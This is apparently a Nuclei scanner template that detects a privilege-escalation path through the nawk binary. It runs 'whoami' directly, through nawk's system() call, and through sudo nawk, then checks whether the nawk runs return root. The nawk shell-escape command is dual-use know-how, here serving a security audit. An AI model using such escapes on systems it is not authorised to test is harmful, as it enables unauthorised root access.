id: privesc-nawk

info:
  name: nawk - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    nawk is an implementation of the AWK programming language. It is a text-processing language that is commonly used for pattern scanning and processing of text files. nawk provides powerful features for data extraction, reporting, and manipulation, making it a valuable tool for text processing tasks in shell scripts and command-line environments.
  reference:
    - https://gtfobins.github.io/gtfobins/nawk/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,nawk,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      nawk 'BEGIN {system("whoami")}'

  - engine:
      - sh
      - bash
    source: |
      sudo nawk 'BEGIN {system("whoami")}'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a0047304502204b79e8efc43ffab5fc287a7be7e7c000eaab0ca0e2c1dc140cd04d820cb7d96b022100c0013e7e565c0554f97752e8746a26932031b1259df74e7a566053b0812abd77:922c64590222798bb761d5b6d8e72950